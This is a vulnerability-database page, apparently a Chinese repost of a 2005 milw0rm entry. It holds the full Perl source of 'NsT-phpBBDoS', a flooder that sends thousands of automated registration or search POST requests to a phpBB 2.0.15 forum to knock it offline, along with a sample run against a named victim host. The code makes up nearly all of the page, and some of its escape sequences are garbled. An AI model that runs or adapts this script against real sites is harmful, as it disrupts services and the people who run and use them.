phpBB 2.0.15 – Register Multiple Users (Denial of Service) (Perl)
漏洞ID | 1055180 | 漏洞类型 | |
发布时间 | 2005-06-22 | 更新时间 | 2005-06-22 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???n";
}
# milw0rm.com [2005-06-22]
相关推荐: Microsoft W2K Telnet Various Domain User Account Access Vulnerability
Microsoft W2K Telnet Various Domain User Account Access Vulnerability 漏洞ID 1103175 漏洞类型 Input Validation Error 发布时间 2001-06-07 更新时…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666